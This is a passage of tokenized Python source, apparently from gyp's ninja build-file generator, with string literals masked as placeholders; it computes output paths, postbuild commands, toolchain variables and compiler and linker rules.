WriteLink ( spec , config_name , config , link_deps ) <EOL> return self . target . binary <EOL> def WriteMacBundle ( self , spec , mac_bundle_depends , is_empty ) : <EOL> assert self . is_mac_bundle <EOL> package_framework = spec [ '<STR_LIT:type>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> output = self . ComputeMacBundleOutput ( ) <EOL> if is_empty : <EOL> output += '<STR_LIT>' <EOL> variables = [ ] <EOL> self . AppendPostbuildVariable ( variables , spec , output , self . target . binary , <EOL> is_command_start = not package_framework ) <EOL> if package_framework and not is_empty : <EOL> variables . append ( ( '<STR_LIT:version>' , self . xcode_settings . GetFrameworkVersion ( ) ) ) <EOL> self . ninja . build ( output , '<STR_LIT>' , mac_bundle_depends , <EOL> variables = variables ) <EOL> else : <EOL> self . ninja . build ( output , '<STR_LIT>' , mac_bundle_depends , <EOL> variables = variables ) <EOL> self . target . bundle = output <EOL> return output <EOL> def GetToolchainEnv ( self , additional_settings = None ) : <EOL> """<STR_LIT>""" <EOL> env = self . GetSortedXcodeEnv ( additional_settings = additional_settings ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> env = self . GetMsvsToolchainEnv ( <EOL> additional_settings = additional_settings ) <EOL> return env <EOL> def GetMsvsToolchainEnv ( self , additional_settings = None ) : <EOL> """<STR_LIT>""" <EOL> return self . msvs_settings . GetVSMacroEnv ( '<STR_LIT>' , <EOL> config = self . config_name ) <EOL> def GetSortedXcodeEnv ( self , additional_settings = None ) : <EOL> """<STR_LIT>""" <EOL> assert self . abs_build_dir <EOL> abs_build_dir = self . abs_build_dir <EOL> return gyp . xcode_emulation . GetSortedXcodeEnv ( <EOL> self . xcode_settings , abs_build_dir , <EOL> os . path . join ( abs_build_dir , self . build_to_base ) , self . config_name , <EOL> additional_settings ) <EOL> def GetSortedXcodePostbuildEnv ( self ) : <EOL> """<STR_LIT>""" <EOL> postbuild_settings = { } <EOL> strip_save_file = self . 
xcode_settings . GetPerTargetSetting ( <EOL> '<STR_LIT>' ) <EOL> if strip_save_file : <EOL> postbuild_settings [ '<STR_LIT>' ] = strip_save_file <EOL> return self . GetSortedXcodeEnv ( additional_settings = postbuild_settings ) <EOL> def AppendPostbuildVariable ( self , variables , spec , output , binary , <EOL> is_command_start = False ) : <EOL> """<STR_LIT>""" <EOL> postbuild = self . GetPostbuildCommand ( spec , output , binary , is_command_start ) <EOL> if postbuild : <EOL> variables . append ( ( '<STR_LIT>' , postbuild ) ) <EOL> def GetPostbuildCommand ( self , spec , output , output_binary , is_command_start ) : <EOL> """<STR_LIT>""" <EOL> if not self . xcode_settings or spec [ '<STR_LIT:type>' ] == '<STR_LIT:none>' or not output : <EOL> return '<STR_LIT>' <EOL> output = QuoteShellArgument ( output , self . flavor ) <EOL> postbuilds = gyp . xcode_emulation . GetSpecPostbuildCommands ( spec , quiet = True ) <EOL> if output_binary is not None : <EOL> postbuilds = self . xcode_settings . AddImplicitPostbuilds ( <EOL> self . config_name , <EOL> os . path . normpath ( os . path . join ( self . base_to_build , output ) ) , <EOL> QuoteShellArgument ( <EOL> os . path . normpath ( os . path . join ( self . base_to_build , output_binary ) ) , <EOL> self . flavor ) , <EOL> postbuilds , quiet = True ) <EOL> if not postbuilds : <EOL> return '<STR_LIT>' <EOL> postbuilds . insert ( <NUM_LIT:0> , gyp . common . EncodePOSIXShellList ( <EOL> [ '<STR_LIT>' , self . build_to_base ] ) ) <EOL> env = self . ComputeExportEnvString ( self . GetSortedXcodePostbuildEnv ( ) ) <EOL> commands = env + '<STR_LIT>' + '<STR_LIT>' . join ( [ ninja_syntax . 
escape ( command ) for command in postbuilds ] ) <EOL> command_string = ( commands + '<STR_LIT>' <EOL> '<STR_LIT>' % output + '<STR_LIT>' ) <EOL> if is_command_start : <EOL> return '<STR_LIT:(>' + command_string + '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' + command_string <EOL> def ComputeExportEnvString ( self , env ) : <EOL> """<STR_LIT>""" <EOL> export_str = [ ] <EOL> for k , v in env : <EOL> export_str . append ( '<STR_LIT>' % <EOL> ( k , ninja_syntax . escape ( gyp . common . EncodePOSIXShellArgument ( v ) ) ) ) <EOL> return '<STR_LIT:U+0020>' . join ( export_str ) <EOL> def ComputeMacBundleOutput ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . is_mac_bundle <EOL> path = generator_default_variables [ '<STR_LIT>' ] <EOL> return self . ExpandSpecial ( <EOL> os . path . join ( path , self . xcode_settings . GetWrapperName ( ) ) ) <EOL> def ComputeOutputFileName ( self , spec , type = None ) : <EOL> """<STR_LIT>""" <EOL> if not type : <EOL> type = spec [ '<STR_LIT:type>' ] <EOL> default_variables = copy . copy ( generator_default_variables ) <EOL> CalculateVariables ( default_variables , { '<STR_LIT>' : self . flavor } ) <EOL> DEFAULT_PREFIX = { <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> } <EOL> prefix = spec . get ( '<STR_LIT>' , DEFAULT_PREFIX . get ( type , '<STR_LIT>' ) ) <EOL> DEFAULT_EXTENSION = { <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : default_variables [ '<STR_LIT>' ] , <EOL> } <EOL> extension = spec . get ( '<STR_LIT>' ) <EOL> if extension : <EOL> extension = '<STR_LIT:.>' + extension <EOL> else : <EOL> extension = DEFAULT_EXTENSION . 
get ( type , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in spec : <EOL> target = spec [ '<STR_LIT>' ] <EOL> else : <EOL> target = spec [ '<STR_LIT>' ] <EOL> if prefix == '<STR_LIT>' : <EOL> target = StripPrefix ( target , '<STR_LIT>' ) <EOL> if type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> return '<STR_LIT>' % ( prefix , target , extension ) <EOL> elif type == '<STR_LIT:none>' : <EOL> return '<STR_LIT>' % target <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % type ) <EOL> def ComputeOutput ( self , spec , arch = None ) : <EOL> """<STR_LIT>""" <EOL> type = spec [ '<STR_LIT:type>' ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> override = self . msvs_settings . GetOutputName ( self . config_name , <EOL> self . ExpandSpecial ) <EOL> if override : <EOL> return override <EOL> if arch is None and self . flavor == '<STR_LIT>' and type in ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> filename = self . xcode_settings . GetExecutablePath ( ) <EOL> else : <EOL> filename = self . ComputeOutputFileName ( spec , type ) <EOL> if arch is None and '<STR_LIT>' in spec : <EOL> path = os . path . join ( spec [ '<STR_LIT>' ] , filename ) <EOL> return self . ExpandSpecial ( path ) <EOL> type_in_output_root = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if self . flavor == '<STR_LIT>' and self . toolset == '<STR_LIT:target>' : <EOL> type_in_output_root += [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif self . flavor == '<STR_LIT>' and self . toolset == '<STR_LIT:target>' : <EOL> type_in_output_root += [ '<STR_LIT>' ] <EOL> if arch is not None : <EOL> archdir = '<STR_LIT>' <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> archdir = os . path . join ( '<STR_LIT>' , '<STR_LIT:%s>' % self . toolset ) <EOL> return os . path . join ( archdir , AddArch ( filename , arch ) ) <EOL> elif type in type_in_output_root or self . is_standalone_static_library : <EOL> return filename <EOL> elif type == '<STR_LIT>' : <EOL> libdir = '<STR_LIT>' <EOL> if self . 
toolset != '<STR_LIT:target>' : <EOL> libdir = os . path . join ( '<STR_LIT>' , '<STR_LIT:%s>' % self . toolset ) <EOL> return os . path . join ( libdir , filename ) <EOL> else : <EOL> return self . GypPathToUniqueOutput ( filename , qualified = False ) <EOL> def WriteVariableList ( self , ninja_file , var , values ) : <EOL> assert not isinstance ( values , str ) <EOL> if values is None : <EOL> values = [ ] <EOL> ninja_file . variable ( var , '<STR_LIT:U+0020>' . join ( values ) ) <EOL> def WriteNewNinjaRule ( self , name , args , description , is_cygwin , env , pool ) : <EOL> """<STR_LIT>""" <EOL> if self . flavor == '<STR_LIT>' : <EOL> args = [ self . msvs_settings . ConvertVSMacros ( <EOL> arg , self . base_to_build , config = self . config_name ) <EOL> for arg in args ] <EOL> description = self . msvs_settings . ConvertVSMacros ( <EOL> description , config = self . config_name ) <EOL> elif self . flavor == '<STR_LIT>' : <EOL> args = [ gyp . xcode_emulation . ExpandEnvVars ( arg , env ) for arg in args ] <EOL> description = gyp . xcode_emulation . ExpandEnvVars ( description , env ) <EOL> rule_name = self . name <EOL> if self . toolset == '<STR_LIT:target>' : <EOL> rule_name += '<STR_LIT:.>' + self . toolset <EOL> rule_name += '<STR_LIT:.>' + name <EOL> rule_name = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , rule_name ) <EOL> protect = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> protect = '<STR_LIT>' + '<STR_LIT:|>' . join ( map ( re . escape , protect ) ) + '<STR_LIT:)>' <EOL> description = re . sub ( protect + r'<STR_LIT>' , '<STR_LIT:_>' , description ) <EOL> rspfile = None <EOL> rspfile_content = None <EOL> args = [ self . ExpandSpecial ( arg , self . base_to_build ) for arg in args ] <EOL> if self . flavor == '<STR_LIT>' : <EOL> rspfile = rule_name + '<STR_LIT>' <EOL> run_in = '<STR_LIT>' if is_cygwin else '<STR_LIT:U+0020>' + self . build_to_base <EOL> if is_cygwin : <EOL> rspfile_content = self . msvs_settings . 
BuildCygwinBashCommandLine ( <EOL> args , self . build_to_base ) <EOL> else : <EOL> rspfile_content = gyp . msvs_emulation . EncodeRspFileList ( args ) <EOL> command = ( '<STR_LIT>' % sys . executable + <EOL> rspfile + run_in ) <EOL> else : <EOL> env = self . ComputeExportEnvString ( env ) <EOL> command = gyp . common . EncodePOSIXShellList ( args ) <EOL> command = '<STR_LIT>' % self . build_to_base + env + command <EOL> self . ninja . rule ( rule_name , command , description , restat = True , pool = pool , <EOL> rspfile = rspfile , rspfile_content = rspfile_content ) <EOL> self . ninja . newline ( ) <EOL> return rule_name , args <EOL> def CalculateVariables ( default_variables , params ) : <EOL> """<STR_LIT>""" <EOL> global generator_additional_non_configuration_keys <EOL> global generator_additional_path_sections <EOL> flavor = gyp . common . GetFlavor ( params ) <EOL> if flavor == '<STR_LIT>' : <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> generator_default_variables [ '<STR_LIT>' ] ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> generator_default_variables [ '<STR_LIT>' ] ) <EOL> import gyp . generator . xcode as xcode_generator <EOL> generator_additional_non_configuration_keys = getattr ( xcode_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> generator_additional_path_sections = getattr ( xcode_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> global generator_extra_sources_for_rules <EOL> generator_extra_sources_for_rules = getattr ( xcode_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> elif flavor == '<STR_LIT>' : <EOL> exts = gyp . MSVSUtil . TARGET_TYPE_EXT <EOL> default_variables . 
setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT:.>' + exts [ '<STR_LIT>' ] <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT:.>' + exts [ '<STR_LIT>' ] <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> default_variables [ '<STR_LIT>' ] = '<STR_LIT:.>' + exts [ '<STR_LIT>' ] <EOL> import gyp . generator . msvs as msvs_generator <EOL> generator_additional_non_configuration_keys = getattr ( msvs_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> generator_additional_path_sections = getattr ( msvs_generator , <EOL> '<STR_LIT>' , [ ] ) <EOL> gyp . msvs_emulation . CalculateCommonVariables ( default_variables , params ) <EOL> else : <EOL> operating_system = flavor <EOL> if flavor == '<STR_LIT>' : <EOL> operating_system = '<STR_LIT>' <EOL> default_variables . setdefault ( '<STR_LIT>' , operating_system ) <EOL> default_variables . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> default_variables . setdefault ( '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def ComputeOutputDir ( params ) : <EOL> """<STR_LIT>""" <EOL> generator_dir = os . path . relpath ( params [ '<STR_LIT>' ] . generator_output or '<STR_LIT:.>' ) <EOL> output_dir = params . get ( '<STR_LIT>' , { } ) . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return os . path . normpath ( os . path . join ( generator_dir , output_dir ) ) <EOL> def CalculateGeneratorInputInfo ( params ) : <EOL> """<STR_LIT>""" <EOL> toplevel = params [ '<STR_LIT>' ] . toplevel_dir <EOL> qualified_out_dir = os . path . normpath ( os . path . 
join ( <EOL> toplevel , ComputeOutputDir ( params ) , '<STR_LIT>' ) ) <EOL> global generator_filelist_paths <EOL> generator_filelist_paths = { <EOL> '<STR_LIT>' : toplevel , <EOL> '<STR_LIT>' : qualified_out_dir , <EOL> } <EOL> def OpenOutput ( path , mode = '<STR_LIT:w>' ) : <EOL> """<STR_LIT>""" <EOL> gyp . common . EnsureDirExists ( path ) <EOL> return open ( path , mode ) <EOL> def CommandWithWrapper ( cmd , wrappers , prog ) : <EOL> wrapper = wrappers . get ( cmd , '<STR_LIT>' ) <EOL> if wrapper : <EOL> return wrapper + '<STR_LIT:U+0020>' + prog <EOL> return prog <EOL> def GetDefaultConcurrentLinks ( ) : <EOL> """<STR_LIT>""" <EOL> pool_size = int ( os . getenv ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> if pool_size : <EOL> return pool_size <EOL> if sys . platform in ( '<STR_LIT:win32>' , '<STR_LIT>' ) : <EOL> import ctypes <EOL> class MEMORYSTATUSEX ( ctypes . Structure ) : <EOL> _fields_ = [ <EOL> ( "<STR_LIT>" , ctypes . c_ulong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ( "<STR_LIT>" , ctypes . c_ulonglong ) , <EOL> ] <EOL> stat = MEMORYSTATUSEX ( ) <EOL> stat . dwLength = ctypes . sizeof ( stat ) <EOL> ctypes . windll . kernel32 . GlobalMemoryStatusEx ( ctypes . byref ( stat ) ) <EOL> mem_limit = max ( <NUM_LIT:1> , stat . ullTotalPhys / ( <NUM_LIT:4> * ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) ) <EOL> hard_cap = max ( <NUM_LIT:1> , int ( os . getenv ( '<STR_LIT>' , <NUM_LIT:2> ** <NUM_LIT:32> ) ) ) <EOL> return min ( mem_limit , hard_cap ) <EOL> elif sys . platform . startswith ( '<STR_LIT>' ) : <EOL> if os . path . exists ( "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" ) as meminfo : <EOL> memtotal_re = re . 
compile ( r'<STR_LIT>' ) <EOL> for line in meminfo : <EOL> match = memtotal_re . match ( line ) <EOL> if not match : <EOL> continue <EOL> return max ( <NUM_LIT:1> , int ( match . group ( <NUM_LIT:1> ) ) / ( <NUM_LIT:8> * ( <NUM_LIT:2> ** <NUM_LIT:20> ) ) ) <EOL> return <NUM_LIT:1> <EOL> elif sys . platform == '<STR_LIT>' : <EOL> try : <EOL> avail_bytes = int ( subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> return max ( <NUM_LIT:1> , avail_bytes / ( <NUM_LIT:4> * ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) ) <EOL> except : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:1> <EOL> def _GetWinLinkRuleNameSuffix ( embed_manifest ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' if embed_manifest else '<STR_LIT>' <EOL> def _AddWinLinkRules ( master_ninja , embed_manifest ) : <EOL> """<STR_LIT>""" <EOL> def FullLinkCommand ( ldcmd , out , binary_type ) : <EOL> resource_name = { <EOL> '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:2>' , <EOL> } [ binary_type ] <EOL> return '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' % { <EOL> '<STR_LIT>' : sys . executable , <EOL> '<STR_LIT>' : out , <EOL> '<STR_LIT>' : ldcmd , <EOL> '<STR_LIT>' : resource_name , <EOL> '<STR_LIT>' : embed_manifest } <EOL> rule_name_suffix = _GetWinLinkRuleNameSuffix ( embed_manifest ) <EOL> use_separate_mspdbsrv = ( <EOL> int ( os . environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) ) != <NUM_LIT:0> ) <EOL> dlldesc = '<STR_LIT>' % rule_name_suffix . upper ( ) <EOL> dllcmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( sys . executable , use_separate_mspdbsrv ) ) <EOL> dllcmd = FullLinkCommand ( dllcmd , '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . rule ( '<STR_LIT>' + rule_name_suffix , <EOL> description = dlldesc , command = dllcmd , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> restat = True , <EOL> pool = '<STR_LIT>' ) <EOL> master_ninja . 
rule ( '<STR_LIT>' + rule_name_suffix , <EOL> description = dlldesc , command = dllcmd , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> restat = True , <EOL> pool = '<STR_LIT>' ) <EOL> exe_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( sys . executable , use_separate_mspdbsrv ) ) <EOL> exe_cmd = FullLinkCommand ( exe_cmd , '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . rule ( '<STR_LIT>' + rule_name_suffix , <EOL> description = '<STR_LIT>' % rule_name_suffix . upper ( ) , <EOL> command = exe_cmd , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> pool = '<STR_LIT>' ) <EOL> def GenerateOutputForConfig ( target_list , target_dicts , data , params , <EOL> config_name ) : <EOL> options = params [ '<STR_LIT>' ] <EOL> flavor = gyp . common . GetFlavor ( params ) <EOL> generator_flags = params . get ( '<STR_LIT>' , { } ) <EOL> build_dir = os . path . normpath ( <EOL> os . path . join ( ComputeOutputDir ( params ) , config_name ) ) <EOL> toplevel_build = os . path . join ( options . toplevel_dir , build_dir ) <EOL> master_ninja_file = OpenOutput ( os . path . join ( toplevel_build , '<STR_LIT>' ) ) <EOL> master_ninja = ninja_syntax . Writer ( master_ninja_file , width = <NUM_LIT> ) <EOL> gyp . common . CopyTool ( flavor , toplevel_build ) <EOL> if flavor == '<STR_LIT>' : <EOL> ar = '<STR_LIT>' <EOL> cc = '<STR_LIT>' <EOL> cxx = '<STR_LIT>' <EOL> ld = '<STR_LIT>' <EOL> ld_host = '<STR_LIT>' <EOL> else : <EOL> ar = '<STR_LIT>' <EOL> cc = '<STR_LIT>' <EOL> cxx = '<STR_LIT>' <EOL> ld = '<STR_LIT>' <EOL> ldxx = '<STR_LIT>' <EOL> ld_host = '<STR_LIT>' <EOL> ldxx_host = '<STR_LIT>' <EOL> ar_host = '<STR_LIT>' <EOL> cc_host = None <EOL> cxx_host = None <EOL> cc_host_global_setting = None <EOL> cxx_host_global_setting = None <EOL> clang_cl = None <EOL> nm = '<STR_LIT>' <EOL> nm_host = '<STR_LIT>' <EOL> readelf = '<STR_LIT>' <EOL> readelf_host = '<STR_LIT>' <EOL> build_file , _ , _ = gyp . common . 
ParseQualifiedTarget ( target_list [ <NUM_LIT:0> ] ) <EOL> make_global_settings = data [ build_file ] . get ( '<STR_LIT>' , [ ] ) <EOL> build_to_root = gyp . common . InvertRelativePath ( build_dir , <EOL> options . toplevel_dir ) <EOL> wrappers = { } <EOL> for key , value in make_global_settings : <EOL> if key == '<STR_LIT>' : <EOL> ar = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> ar_host = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> cc = os . path . join ( build_to_root , value ) <EOL> if cc . endswith ( '<STR_LIT>' ) : <EOL> clang_cl = cc <EOL> if key == '<STR_LIT>' : <EOL> cxx = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> cc_host = os . path . join ( build_to_root , value ) <EOL> cc_host_global_setting = value <EOL> if key == '<STR_LIT>' : <EOL> cxx_host = os . path . join ( build_to_root , value ) <EOL> cxx_host_global_setting = value <EOL> if key == '<STR_LIT>' : <EOL> ld = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> ld_host = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> nm = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> nm_host = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> readelf = os . path . join ( build_to_root , value ) <EOL> if key == '<STR_LIT>' : <EOL> readelf_host = os . path . join ( build_to_root , value ) <EOL> if key . endswith ( '<STR_LIT>' ) : <EOL> wrappers [ key [ : - len ( '<STR_LIT>' ) ] ] = os . path . join ( build_to_root , value ) <EOL> for key , value in os . environ . items ( ) : <EOL> if key . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> key_prefix = key [ : - len ( '<STR_LIT>' ) ] <EOL> key_prefix = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , key_prefix ) <EOL> wrappers [ key_prefix ] = os . path . 
join ( build_to_root , value ) <EOL> if flavor == '<STR_LIT>' : <EOL> configs = [ target_dicts [ qualified_target ] [ '<STR_LIT>' ] [ config_name ] <EOL> for qualified_target in target_list ] <EOL> shared_system_includes = None <EOL> if not generator_flags . get ( '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> shared_system_includes = gyp . msvs_emulation . ExtractSharedMSVSSystemIncludes ( <EOL> configs , generator_flags ) <EOL> cl_paths = gyp . msvs_emulation . GenerateEnvironmentFiles ( <EOL> toplevel_build , generator_flags , shared_system_includes , OpenOutput ) <EOL> for arch , path in cl_paths . items ( ) : <EOL> if clang_cl : <EOL> path = clang_cl <EOL> command = CommandWithWrapper ( '<STR_LIT>' , wrappers , <EOL> QuoteShellArgument ( path , '<STR_LIT>' ) ) <EOL> if clang_cl : <EOL> command += ( '<STR_LIT>' if arch == '<STR_LIT>' else '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' + arch , command ) <EOL> cc = GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , cc ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , cc ) ) <EOL> cxx = GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , cxx ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , cxx ) ) <EOL> if flavor == '<STR_LIT>' : <EOL> master_ninja . variable ( '<STR_LIT>' , ld ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' , ar ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> master_ninja . variable ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , ld ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( '<STR_LIT>' , wrappers , ldxx ) ) <EOL> master_ninja . 
variable ( '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , ar ) ) <EOL> if flavor != '<STR_LIT>' : <EOL> master_ninja . variable ( <EOL> '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , nm ) ) <EOL> master_ninja . variable ( <EOL> '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' , '<STR_LIT>' ] , readelf ) ) <EOL> if generator_supports_multiple_toolsets : <EOL> if not cc_host : <EOL> cc_host = cc <EOL> if not cxx_host : <EOL> cxx_host = cxx <EOL> master_ninja . variable ( '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' ] , ar_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , GetEnvironFallback ( [ '<STR_LIT>' ] , nm_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , <EOL> GetEnvironFallback ( [ '<STR_LIT>' ] , readelf_host ) ) <EOL> cc_host = GetEnvironFallback ( [ '<STR_LIT>' ] , cc_host ) <EOL> cxx_host = GetEnvironFallback ( [ '<STR_LIT>' ] , cxx_host ) <EOL> if '<STR_LIT>' in cc_host and cc_host_global_setting : <EOL> cc_host = cc_host_global_setting . replace ( '<STR_LIT>' , cc ) <EOL> if '<STR_LIT>' in cxx_host and cxx_host_global_setting : <EOL> cxx_host = cxx_host_global_setting . replace ( '<STR_LIT>' , cxx ) <EOL> master_ninja . variable ( '<STR_LIT>' , <EOL> CommandWithWrapper ( '<STR_LIT>' , wrappers , cc_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , <EOL> CommandWithWrapper ( '<STR_LIT>' , wrappers , cxx_host ) ) <EOL> if flavor == '<STR_LIT>' : <EOL> master_ninja . variable ( '<STR_LIT>' , ld_host ) <EOL> else : <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( <EOL> '<STR_LIT>' , wrappers , ld_host ) ) <EOL> master_ninja . variable ( '<STR_LIT>' , CommandWithWrapper ( <EOL> '<STR_LIT>' , wrappers , ldxx_host ) ) <EOL> master_ninja . newline ( ) <EOL> master_ninja . pool ( '<STR_LIT>' , depth = GetDefaultConcurrentLinks ( ) ) <EOL> master_ninja . newline ( ) <EOL> deps = '<STR_LIT>' if flavor == '<STR_LIT>' else '<STR_LIT>' <EOL> if flavor != '<STR_LIT>' : <EOL> master_ninja . 
rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> depfile = '<STR_LIT>' , <EOL> deps = deps ) <EOL> else : <EOL> cc_command = ( '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cxx_command = ( '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = cc_command , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = cxx_command , <EOL> rspfile = '<STR_LIT>' , <EOL> rspfile_content = '<STR_LIT>' , <EOL> deps = deps ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % sys . executable ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> sys . executable ) ) <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> sys . executable ) ) <EOL> if flavor != '<STR_LIT>' and flavor != '<STR_LIT>' : <EOL> master_ninja . rule ( <EOL> '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> command = '<STR_LIT>' ) <EOL> master_ninja . 
